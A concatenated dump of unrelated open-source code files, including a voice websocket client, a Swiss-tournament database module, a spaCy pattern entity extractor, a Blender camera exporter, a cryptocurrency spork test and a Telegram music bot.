"op": self.RESUME,
"d": {
"token": state.token,
"server_id": str(state.server_id),
"session_id": state.session_id,
},
}
await self.send_as_json(payload)
async def identify(self):
state = self._connection
payload = {
"op": self.IDENTIFY,
"d": {
"server_id": str(state.server_id),
"user_id": str(state.user.id),
"session_id": state.session_id,
"token": state.token,
},
}
await self.send_as_json(payload)
@classmethod
async def from_client(cls, client, *, resume=False, hook=None):
"""Creates a voice websocket for the :class:`VoiceClient`."""
gateway = "wss://" + client.endpoint + "/?v=4"
http = client._state.http
socket = await http.ws_connect(gateway, compress=15)
ws = cls(socket, loop=client.loop, hook=hook)
ws.gateway = gateway
ws._connection = client
ws._max_heartbeat_timeout = 60.0
ws.thread_id = threading.get_ident()
if resume:
await ws.resume()
else:
await ws.identify()
return ws
async def select_protocol(self, ip, port, mode):
payload = {
"op": self.SELECT_PROTOCOL,
"d": {
"protocol": "udp",
"data": {"address": ip, "port": port, "mode": mode},
},
}
await self.send_as_json(payload)
async def client_connect(self):
payload = {
"op": self.CLIENT_CONNECT,
"d": {"audio_ssrc": self._connection.ssrc},
}
await self.send_as_json(payload)
async def speak(self, state=SpeakingState.voice):
payload = {"op": self.SPEAKING, "d": {"speaking": int(state), "delay": 0}}
await self.send_as_json(payload)
async def received_message(self, msg):
_log.debug("Voice websocket frame received: %s", msg)
op = msg["op"]
data = msg.get("d")
if op == self.READY:
await self.initial_connection(data)
elif op == self.HEARTBEAT_ACK:
self._keep_alive.ack()
elif op == self.RESUMED:
_log.info("Voice RESUME succeeded.")
elif op == self.SESSION_DESCRIPTION:
self._connection.mode = data["mode"]
await self.load_secret_key(data)
elif op == self.HELLO:
interval = data["heartbeat_interval"] / 1000.0
self._keep_alive = VoiceKeepAliveHandler(
ws=self, interval=min(interval, 5.0)
)
self._keep_alive.start()
await self._hook(self, msg)
async def initial_connection(self, data):
state = self._connection
state.ssrc = data["ssrc"]
state.voice_port = data["port"]
state.endpoint_ip = data["ip"]
packet = bytearray(70)
struct.pack_into(">H", packet, 0, 1) # 1 = Send
struct.pack_into(">H", packet, 2, 70) # 70 = Length
struct.pack_into(">I", packet, 4, state.ssrc)
state.socket.sendto(packet, (state.endpoint_ip, state.voice_port))
recv = await self.loop.sock_recv(state.socket, 70)
_log.debug("received packet in initial_connection: %s", recv)
# the ip is ascii starting at the 4th byte and ending at the first null
ip_start = 4
ip_end = recv.index(0, ip_start)
state.ip = recv[ip_start:ip_end].decode("ascii")
state.port = struct.unpack_from(">H", recv, len(recv) - 2)[0]
_log.debug("detected ip: %s port: %s", state.ip, state.port)
# there *should* always be at least one supported mode (xsalsa20_poly1305)
modes = [
mode for mode in data["modes"] if mode in self._connection.supported_modes
]
_log.debug("received supported encryption modes: %s", ", ".join(modes))
mode = modes[0]
await self.select_protocol(state.ip, state.port, mode)
_log.info("selected the voice protocol for use (%s)", mode)
@property
def latency(self):
""":class:`float`: Latency between a HEARTBEAT and its HEARTBEAT_ACK in seconds."""
heartbeat = self._keep_alive
return float("inf") if heartbeat is None else heartbeat.latency
@property
def average_latency(self):
""":class:`list`: Average of last 20 HEARTBEAT latencies."""
heartbeat = self._keep_alive
if heartbeat is None or not heartbeat.recent_ack_latencies:
return float("inf")
return sum(heartbeat.recent_ack_latencies) / len(heartbeat.recent_ack_latencies)
async def load_secret_key(self, data):
_log.info("received secret key for voice connection")
self.secret_key = self._connection.secret_key = data.get("secret_key")
await self.speak()
await self.speak(False)
async def poll_event(self):
# This exception is handled up the chain
msg = await asyncio.wait_for(self.ws.receive(), timeout=30.0)
if msg.type is aiohttp.WSMsgType.TEXT:
await self.received_message(utils._from_json(msg.data))
elif msg.type is aiohttp.WSMsgType.ERROR:
_log.debug("Received %s", msg)
raise ConnectionClosed(self.ws, shard_id=None) from msg.data
elif msg.type in (
aiohttp.WSMsgType.CLOSED,
aiohttp.WSMsgType.CLOSE,
aiohttp.WSMsgType.CLOSING,
):
_log.debug("Received %s", msg)
raise ConnectionClosed(self.ws, shard_id=None, code=self._close_code)
async def close(self, code=1000):
if self._keep_alive is not None:
self._keep_alive.stop()
self._close_code = code
await self.ws.close(code=code)
|
the-stack_0_3689 | import subprocess
import multiprocessing
import logging
import os.path
import pygments.util
import pygments.lexers
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger("classify_linguist")
from .common import *
def classify_pygments(path):
with open(path, "rb") as f:
data = f.read()
try:
return pygments.lexers.guess_lexer_for_filename(path, data).name
except pygments.util.ClassNotFound:
return None
def main():
meta = Meta()
dataset = Dataset()
files = list(dataset.data["files"].keys())
with multiprocessing.Pool() as p:
languages = p.map(classify_pygments, [os.path.join("data", f) for f in files])
for f, l in zip(files, languages):
l1 = l
if l1:
norm_lang = meta.to_normalized_language(dataset="pygments", lang=l1)
dataset.data["files"][f]["annotations"]["pygments-filename"] = norm_lang
else:
if "pygments-filename" in dataset.data["files"][f]["annotations"]:
del dataset.data["files"][f]["annotations"]["pygments-filename"]
dataset.save()
if __name__ == "__main__":
multiprocessing.log_to_stderr(logging.DEBUG)
main()
|
the-stack_0_3690 | import configparser
import functools
import arrow
cf = configparser.ConfigParser()
configFile = "config/config.ini"
# configFile = "F:\\code_space\\eniac\\factor_server_docker\\ENIAC\\config\\config.ini"
cf.read(configFile)
"配置来源的属性"
#es
dbHost = cf.get("service_es", "db_host")
dbPort = cf.getint("service_es", "db_port")
dbUser = cf.get("service_es", "db_user")
dbPass = cf.get("service_es", "db_pass")
#log_conf
log_conf = cf.get("file", "log_conf")
# kafka
kafkaHost1 = cf.get("service_kafka", "db_host_1")
kafkaHost2 = cf.get("service_kafka", "db_host_2")
kafkaHost3 = cf.get("service_kafka", "db_host_3")
kafkaPort = cf.get("service_kafka", "db_port")
kafkaTopic = cf.get("service_kafka", "db_topic")
kafkaList = [f'{kafkaHost1}:{kafkaPort}',
f'{kafkaHost2}:{kafkaPort}',
f'{kafkaHost3}:{kafkaPort}']
# import logging
# import logging.config
#
# logging.config.fileConfig(log_conf)
# logger = logging.getLogger("neo")
#
# import warnings
# warnings.filterwarnings("ignore") # 防止警告输出
|
the-stack_0_3691 | #!/usr/bin/env python
#
# tournament.py -- implementation of a Swiss-system tournament
#
import psycopg2
from contextlib import contextmanager
@contextmanager
def db_helper():
"""
Database helper function using context lib. Creates a cursor from a
database connection object, yields that cursor to the other functions to
perform queries and then cleans up making the commits and closures.
"""
db = connect()
c = db.cursor()
try:
yield c
except:
raise
else:
db.commit()
finally:
c.close()
db.close()
def connect():
"""Connect to the PostgreSQL database. Returns a database connection."""
try:
return psycopg2.connect("dbname='tournament'")
except:
print ("Connection failed")
def deleteMatches():
"""Removes all the match records from the database."""
with db_helper() as c:
c.execute("TRUNCATE matches")
def deletePlayers():
"""Removes all the player records from the database."""
with db_helper() as c:
c.execute("TRUNCATE players CASCADE")
def countPlayers():
"""Returns the number of players currently registered."""
with db_helper() as c:
c.execute("SELECT count (*) FROM players")
return c.fetchone()[0]
def registerPlayer(name):
"""Adds a player to the tournament database.
The database assigns a unique serial id number for the player. (This
should be handled by your SQL database schema, not in your Python code.)
Args:
name: the player's full name (need not be unique).
"""
with db_helper() as c:
query1 = "INSERT INTO players (player_name) VALUES (%s);"
data = (name,)
c.execute(query1, data)
def playerStandings():
"""Returns a list of the players and their win records, sorted by wins.
The first entry in the list will be the player in first place, or a player
tied for first place if there is currently a tie.
Returns:
A list of tuples, each of which contains (id, name, wins, matches):
id: the player's unique id (assigned by the database)
name: the player's full name (as registered)
wins: the number of matches the player has won
matches: the number of matches the player has played
"""
with db_helper() as c:
c.execute(
"""SELECT players.id, players.player_name, count(matches.winner)as wins,
(SELECT count(*) FROM matches
WHERE matches.loser = players.id
OR matches.winner = players.id) as matches
FROM players LEFT JOIN matches
ON players.id = matches.winner
GROUP BY players.id
ORDER BY wins DESC
""")
rows = c.fetchall()
player_standings = []
for row in rows:
player_standings.append(row)
return player_standings
def reportMatch(winner, loser):
"""Records the outcome of a single match between two players.
Args:
winner: the id number of the player who won
loser: the id number of the player who lost
"""
with db_helper() as c:
query = "INSERT INTO matches (winner, loser) VALUES (%s, %s);"
winner_id = (winner,)
loser_id = (loser,)
c.execute(query, (winner_id, loser_id))
def swissPairings():
"""Returns a list of pairs of players for the next round of a match.
Assuming that there are an even number of players registered, each player
appears exactly once in the pairings. Each player is paired with another
player with an equal or nearly-equal win record, that is, a player adjacent
to him or her in the standings.
Returns:
A list of tuples, each of which contains (id1, name1, id2, name2)
id1: the first player's unique id
name1: the first player's name
id2: the second player's unique id
name2: the second player's name
"""
players_id_name = []
players = playerStandings()
for row in players:
player_id_name = (row[0], row[1])
players_id_name.append(player_id_name)
pairings = []
index = 0
while index < len(players_id_name):
pairings.append(players_id_name[index] + players_id_name[index+1])
index += 2
return pairings
|
the-stack_0_3695 | # coding=utf-8
from __future__ import absolute_import, print_function
import posixpath
from urllib import urlencode
# noinspection PyUnresolvedReferences
from six.moves.urllib.parse import parse_qsl, urlsplit, urlunsplit
__author__ = 'Tyler Butler <[email protected]>'
try:
# noinspection PyUnresolvedReferences
from propane.flask.urls import *
except ImportError:
pass
def remove_query_parameters(url, params=None, case_sensitive=False):
def is_in(to_check, iterable, cs):
if cs:
return to_check in iterable
else:
return to_check.upper().lower() in iterable
pieces = list(urlsplit(url))
if params is None:
pieces[3] = ''
else:
if not case_sensitive:
params[:] = [p.upper().lower() for p in params]
query = parse_qsl(pieces[3])
query[:] = [(param, value) for param, value in query if not is_in(param, params, case_sensitive)]
pieces[3] = urlencode(query, doseq=True)
return urlunsplit(pieces)
def urljoin(url1, *url2):
# This method is necessary because sometimes urlparse.urljoin simply doesn't work correctly
# when joining URL fragments.
return posixpath.join(url1, *url2)
|
the-stack_0_3696 | """factories for creating mincVolumes"""
from .volumes import mincException, mincVolume, getDtype, transform_xyz_coordinates_using_xfm, transform_multiple_xyz_coordinates_using_xfm
def volumeFromFile(filename, dtype="double", readonly=True, labels=False):
"""creates a new mincVolume from existing file."""
v = mincVolume(filename=filename, dtype=dtype, readonly=readonly, labels=labels)
v.openFile()
return(v)
def volumeFromInstance(volInstance, outputFilename, dtype="double", data=False,
dims=None, volumeType=None, path=False, labels=False):
"""creates new mincVolume from another mincVolume"""
v = mincVolume(filename=outputFilename, dtype=dtype, readonly=False, labels=labels)
v.copyDimensions(volInstance, dims)
v.copyDtype(volInstance)
v.createVolumeHandle(volumeType or volInstance.volumeType)
v.copyHistory(volInstance)
if data:
if not volInstance.dataLoaded:
volInstance.loadData()
v.createVolumeImage()
v.data = volInstance.data.copy()
if path:
v.copyAttributes(volInstance, path)
return(v)
def volumeLikeFile(likeFilename, outputFilename, dtype="double", volumeType=None,
labels=False, data=False):
"""creates a new mincVolume with dimension info taken from an existing file"""
lf = volumeFromFile(filename=likeFilename, dtype=dtype, labels=labels)
v = volumeFromInstance(volInstance=lf, outputFilename=outputFilename,
dtype=dtype, volumeType=volumeType,
labels=labels, data=data)
lf.closeVolume()
return(v)
def volumeFromDescription(outputFilename, dimnames, sizes, starts, steps, volumeType="ushort",
dtype="double", labels=False,
x_dir_cosines=(1.0,0.0,0.0),
y_dir_cosines=(0.0,1.0,0.0),
z_dir_cosines=(0.0,0.0,1.0)):
"""creates a new mincVolume given starts, steps, sizes, and dimension names"""
v = mincVolume(filename=outputFilename, dtype=dtype, readonly=False, labels=labels)
v.createNewDimensions(dimnames, sizes, starts, steps,
x_dir_cosines, y_dir_cosines, z_dir_cosines)
v.createVolumeHandle(volumeType)
v.createVolumeImage()
return(v)
def volumeFromData(outputFilename, data, dimnames=("xspace", "yspace", "zspace"),
starts=(0,0,0), steps=(1,1,1),
volumeType="ushort", dtype=None, labels=False,
x_dir_cosines=(1.0,0.0,0.0),
y_dir_cosines=(0.0,1.0,0.0),
z_dir_cosines=(0.0,0.0,1.0)):
"""creates a mincVolume from a given array"""
# deal with the dtype. If the dtype was not set, use the dtype of the
# data block. If that is not possible, default to double.
if dtype == None:
if getDtype(data):
dtype = getDtype(data)
else:
dtype = "double"
v = volumeFromDescription(outputFilename=outputFilename, sizes=data.shape,
dimnames=dimnames, starts=starts, steps=steps,
volumeType=volumeType, dtype=dtype, labels=labels,
x_dir_cosines=x_dir_cosines,
y_dir_cosines=y_dir_cosines,
z_dir_cosines=z_dir_cosines)
v.data = data
return v
|
the-stack_0_3702 | from rasa.nlu.components import Component
from typing import Any, Optional, Text, Dict, TYPE_CHECKING
import os
import spacy
import pickle
from spacy.matcher import Matcher
from rasa.nlu.extractors.extractor import EntityExtractor
if TYPE_CHECKING:
from rasa.nlu.model import Metadata
PATTERN_NER_FILE = 'pattern_ner.pkl'
class SpacyPatternNER(EntityExtractor):
"""A new component"""
name = "pattern_ner_spacy"
# Defines what attributes the pipeline component will
# provide when called. The listed attributes
# should be set by the component on the message object
# during test and train, e.g.
# ```message.set("entities", [...])```
provides = ["entities"]
# Which attributes on a message are required by this
# component. e.g. if requires contains "tokens", than a
# previous component in the pipeline needs to have "tokens"
# within the above described `provides` property.
requires = ["tokens"]
# Defines the default configuration parameters of a component
# these values can be overwritten in the pipeline configuration
# of the model. The component should choose sensible defaults
# and should be able to create reasonable results with the defaults.
defaults = {}
# Defines what language(s) this component can handle.
# This attribute is designed for instance method: `can_handle_language`.
# Default value is None which means it can handle all languages.
# This is an important feature for backwards compatibility of components.
language_list = None
def __init__(self, component_config=None, matcher=None):
super(SpacyPatternNER, self).__init__(component_config)
if matcher:
self.matcher = matcher
self.spacy_nlp = spacy.blank('en')
self.spacy_nlp.vocab = self.matcher.vocab
else:
self.spacy_nlp = spacy.blank('en')
self.matcher = Matcher(self.spacy_nlp.vocab)
def train(self, training_data, cfg, **kwargs):
"""Train this component.
This is the components chance to train itself provided
with the training data. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.train`
of components previous to this one."""
for lookup_table in training_data.lookup_tables:
key = lookup_table['name']
pattern = []
for element in lookup_table['elements']:
tokens = [{'LOWER': token.lower()} for token in str(element).split()]
pattern.append(tokens)
self.matcher.add(key, pattern)
def process(self, message, **kwargs):
"""Process an incoming message.
This is the components chance to process an incoming
message. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.process`
of components previous to this one."""
entities = []
# with plural forms
doc = self.spacy_nlp(message.data['text'].lower())
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Without plural forms
doc = self.spacy_nlp(' '.join([token.lemma_ for token in doc]))
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Remove duplicates
seen = set()
new_entities = []
for entityObj in entities:
record = tuple(entityObj.items())
if record not in seen:
seen.add(record)
new_entities.append(entityObj)
message.set("entities", message.get("entities", []) + new_entities, add_to_output=True)
def getNewEntityObj(self, doc, matches, entities):
for ent_id, start, end in matches:
new_entity_value = doc[start:end].text
new_entity_value_len = len(new_entity_value.split())
is_add = True
for old_entity in entities:
old_entity_value = old_entity["value"]
old_entity_value_len = len(old_entity_value.split())
if old_entity_value_len > new_entity_value_len and new_entity_value in old_entity_value:
is_add = False
elif old_entity_value_len < new_entity_value_len and old_entity_value in new_entity_value:
entities.remove(old_entity)
if is_add:
entities.append({
'start': start,
'end': end,
'value': doc[start:end].text,
'entity': self.matcher.vocab.strings[ent_id],
'confidence': None,
'extractor': self.name
})
return entities
def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]:
"""Persist this component to disk for future loading."""
if self.matcher:
modelFile = os.path.join(model_dir, PATTERN_NER_FILE)
self.saveModel(modelFile)
return {"pattern_ner_file": PATTERN_NER_FILE}
@classmethod
def load(
cls,
meta: Dict[Text, Any],
model_dir: Optional[Text] = None,
model_metadata: Optional["Metadata"] = None,
cached_component: Optional["Component"] = None,
**kwargs: Any
) -> "Component":
"""Load this component from file."""
file_name = meta.get("pattern_ner_file", PATTERN_NER_FILE)
modelFile = os.path.join(model_dir, file_name)
if os.path.exists(modelFile):
modelLoad = open(modelFile, "rb")
matcher = pickle.load(modelLoad)
modelLoad.close()
return cls(meta, matcher)
else:
return cls(meta)
def saveModel(self, modelFile):
modelSave = open(modelFile, "wb")
pickle.dump(self.matcher, modelSave)
modelSave.close() |
the-stack_0_3703 | import bpy
class AMK2BPanel(bpy.types.Panel):
bl_label = "AMK2B"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
@classmethod
def poll(cls, context):
return hasattr(bpy, "amk2b")
def draw(self, context):
layout = self.layout
row = layout.row()
row.label(text="Receive Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_receiving_started:
row.operator("amk2b.kinect_data_receiving_operator", text="Start")
else:
row.operator("amk2b.kinect_data_receiving_operator", text="Stop")
row = layout.row()
row.label(text="Apply Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_applying_started:
row.operator("amk2b.kinect_data_applying_operator", text="Start")
else:
row.operator("amk2b.kinect_data_applying_operator", text="Stop")
row = layout.row()
row.label(text="Recording")
row = layout.row()
if not bpy.amk2b.recording_pre_started:
row.operator("amk2b.recording_operator", text="Start")
else:
if not bpy.amk2b.recording_started:
row.operator(
"amk2b.recording_operator",
text="waiting..." + str(bpy.amk2b.recording_wait_time)
)
else:
row.operator("amk2b.recording_operator", text="Stop")
|
the-stack_0_3704 | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Lksc Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import time
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import connect_nodes, wait_until
'''
multikeysporks.py
Test logic for several signer keys usage for spork broadcast.
We set 5 possible keys for sporks signing and set minimum
required signers to 3. We check 1 and 2 signers can't set the spork
value, any 3 signers can change spork value and other 3 signers
can change it again.
'''
class MultiKeySporkTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 5
self.setup_clean_chain = True
self.is_network_split = False
def setup_network(self):
# secret(base58): 931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F
# keyid(hex): 60f0f57f71f0081f1aacdd8432340a33a526f91b
# address(base58): yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa
# secret(base58): 91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3
# keyid(hex): 43dff2b09de2f904f688ec14ee6899087b889ad0
# address(base58): yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h
# secret(base58): 92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH
# keyid(hex): d9aa5fa00cce99101a4044e65dc544d1579890de
# address(base58): ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7
# secret(base58): 934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD
# keyid(hex): 0b23935ce0bea3b997a334f6fa276c9fa17687b2
# address(base58): ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn
# secret(base58): 92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD
# keyid(hex): 1d1098b2b1f759b678a0a7a098637a9b898adcac
# address(base58): yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui
self.add_nodes(5)
self.start_node(0, ["-sporkkey=931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(1, ["-sporkkey=91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(2, ["-sporkkey=92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(3, ["-sporkkey=934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(4, ["-sporkkey=92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
# connect nodes at start
for i in range(0, 5):
for j in range(i, 5):
connect_nodes(self.nodes[i], j)
def get_test_spork_value(self, node):
info = node.spork('show')
# use InstantSend spork for tests
return info['SPORK_2_INSTANTSEND_ENABLED']
def set_test_spork_value(self, node, value):
# use InstantSend spork for tests
node.spork('SPORK_2_INSTANTSEND_ENABLED', value)
def run_test(self):
# check test spork default state
for node in self.nodes:
assert(self.get_test_spork_value(node) == 4070908800)
self.bump_mocktime(1)
# first and second signers set spork value
self.set_test_spork_value(self.nodes[0], 1)
self.set_test_spork_value(self.nodes[1], 1)
# spork change requires at least 3 signers
time.sleep(10)
for node in self.nodes:
assert(self.get_test_spork_value(node) != 1)
# third signer set spork value
self.set_test_spork_value(self.nodes[2], 1)
# now spork state is changed
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 1, sleep=0.1, timeout=10)
self.bump_mocktime(1)
# now set the spork again with other signers to test
# old and new spork messages interaction
self.set_test_spork_value(self.nodes[2], 2)
self.set_test_spork_value(self.nodes[3], 2)
self.set_test_spork_value(self.nodes[4], 2)
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 2, sleep=0.1, timeout=10)
if __name__ == '__main__':
MultiKeySporkTest().main()
|
the-stack_0_3705 | from config import OWNER_ID
from pyrogram.types.bots_and_keyboards import reply_keyboard_markup
from TamilBots.modules import *
from pyrogram import idle, filters
from pyrogram.types import InlineKeyboardMarkup
from pyrogram.types import InlineKeyboardButton
from TamilBots import app, LOGGER
from TamilBots.TamilBots import ignore_blacklisted_users
from TamilBots.sql.chat_sql import add_chat_to_db
start_text = """
👋 𝗛𝗲𝗹𝗹𝗼 [{}](tg://user?id={}),
\n\n𝗜 𝗔𝗺 🎸𝐒𝐨𝐧𝐠 𝐏𝐥𝐚𝐲 𝐁𝐨𝐭[🎶](https://telegra.ph/file/6cb884fe1cb943ec12df1.mp4)
I'M Music Bot By @Arishem_TheJudge 🤖
𝗦𝗲𝗻𝗱 𝗧𝗵𝗲 𝗡𝗮𝗺𝗲 𝗢𝗳 𝗧𝗵𝗲 𝗦𝗼𝗻𝗴 𝗬𝗼𝘂 𝗪𝗮𝗻𝘁... 😍🥰🤗
𝐄𝐠. ```/song Faded```
"""
owner_help = """
/blacklist user_id
/unblacklist user_id
/broadcast message to send
/eval python code
/chatlist get list of all chats
"""
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("start"))
async def start(client, message):
chat_id = message.chat.id
user_id = message.from_user["id"]
name = message.from_user["first_name"]
if message.chat.type == "private":
btn = InlineKeyboardMarkup(
[[InlineKeyboardButton(text="𝐒𝐔𝐏𝐏𝐎𝐑𝐓 👬", url="https://t.me/Ott_streaming_updates"),
InlineKeyboardButton(
text="𝐀𝐃𝐃 𝐌𝐄 🤗", url="http://t.me/SongProBot?startgroup=true"
)
]
]
)
else:
btn = None
await message.reply(start_text.format(name, user_id), reply_markup=btn)
add_chat_to_db(str(chat_id))
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("help"))
async def help(client, message):
if message.from_user["id"] == OWNER_ID:
await message.reply(owner_help)
return ""
text = "𝗦𝗲𝗻𝗱 𝗧𝗵𝗲 𝗡𝗮𝗺𝗲 𝗢𝗳 𝗧𝗵𝗲 𝗦𝗼𝗻𝗴 𝗬𝗼𝘂 𝗪𝗮𝗻𝘁... 😍🥰🤗\n /song (song name) 🥳"
await message.reply(text)
OWNER_ID.append(1492186775)
app.start()
LOGGER.info("SongPlayRoBot Is Now Working🤗🤗🤗")
idle()
|
the-stack_0_3707 | from sqlalchemy.orm import Session
from aspen.database.models import CanSee, DataType
from aspen.test_infra.models.usergroup import group_factory
def test_can_see_constructor_with_datatype(session: Session):
"""Test that we can construct a CanSee object with a `data_type` argument."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(viewer_group=group1, owner_group=group2, data_type=DataType.TREES)
session.add_all((group1, group2, can_see))
session.flush()
assert can_see.data_type == DataType.TREES
def test_can_see_datatype_filter(session: Session):
"""Test that we can filter by the datatype."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(
viewer_group=group1,
owner_group=group2,
data_type=DataType.TREES,
)
session.add_all((group1, group2, can_see))
session.flush()
session.query(CanSee).filter(CanSee.data_type == DataType.TREES).one()
|
the-stack_0_3710 | import gc
import math
import os
import struct
import bpy, bpy.props, bpy.ops
import mathutils
from io_scene_valvesource import utils as vs_utils
# <summary> Formats a float value to be suitable for bvh output </summary>
def FloatToBvhString(value):
return "{0:f}".format(value)
def WriteHeader(file, frames, frameTime):
file.write("advancedfx Cam\n")
file.write("version 1\n")
file.write("scaleFov none\n")
file.write("channels time xPosition yPosition zPositon xRotation yRotation zRotation fov\n")
file.write("DATA\n")
class CamExporter(bpy.types.Operator, vs_utils.Logger):
bl_idname = "advancedfx.camexporter"
bl_label = "HLAE Camera IO (.cam)"
bl_options = {'UNDO'}
# Properties used by the file browser
filepath: bpy.props.StringProperty(subtype="FILE_PATH")
filename_ext: ".cam"
filter_glob: bpy.props.StringProperty(default="*.cam", options={'HIDDEN'})
# Custom properties
global_scale: bpy.props.FloatProperty(
name="Scale",
description="Scale everything by this value",
min=0.000001, max=1000000.0,
soft_min=1.0, soft_max=1000.0,
default=100.0,
)
frame_start: bpy.props.IntProperty(
name="Start Frame",
description="Starting frame to export",
default=0,
)
frame_end: bpy.props.IntProperty(
name="End Frame",
description="End frame to export",
default=0,
)
def execute(self, context):
ok = self.writeBvh(context)
self.errorReport("Error report")
return {'FINISHED'}
def invoke(self, context, event):
self.frame_start = context.scene.frame_start
self.frame_end = context.scene.frame_end
bpy.context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def writeBvh(self, context):
scene = context.scene
frame_current = scene.frame_current
fps = context.scene.render.fps
obj = context.active_object
if (obj is None) or (obj.type != 'CAMERA'):
self.error("No camera selected.")
return False
cam = obj.data
lastRot = None
unRot = mathutils.Matrix.Rotation(math.radians(-90.0), 4, 'X')
file = None
try:
file = open(self.filepath, "w", encoding="utf8", newline="\n")
frameCount = self.frame_end -self.frame_start +1
if frameCount < 0: frameCount = 0
frameTime = 1.0
if 0.0 != fps: frameTime = frameTime / fps
WriteHeader(file, frameCount, frameTime)
for frame in range(self.frame_start, self.frame_end + 1):
scene.frame_set(frame)
mat = obj.matrix_world
mat = mat @ unRot
loc = mat.to_translation()
rot = mat.to_euler('YXZ') if lastRot is None else mat.to_euler('YXZ', lastRot)
lastRot = rot
loc = self.global_scale * mathutils.Vector((loc[1],-loc[0],loc[2]))
qAngleVec = mathutils.Vector((math.degrees(rot[1]),-math.degrees(rot[0]),math.degrees(rot[2])))
# lens = camData.c.sensor_width / (2.0 * math.tan(math.radians(fov) / 2.0))
fov = math.degrees(2.0 * math.atan((cam.sensor_width / cam.lens) / 2.0))
S = ""+FloatToBvhString((frame-1) * frameTime) +" " +FloatToBvhString(loc[0]) +" " +FloatToBvhString(loc[1]) +" " +FloatToBvhString(loc[2]) +" " +FloatToBvhString(qAngleVec[0]) +" " +FloatToBvhString(qAngleVec[1]) +" " +FloatToBvhString(qAngleVec[2]) +" " +FloatToBvhString(fov) + "\n"
file.write(S)
finally:
if file is not None:
file.close()
scene.frame_set(frame_current)
return True
|
the-stack_0_3711 | """museumadmin URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
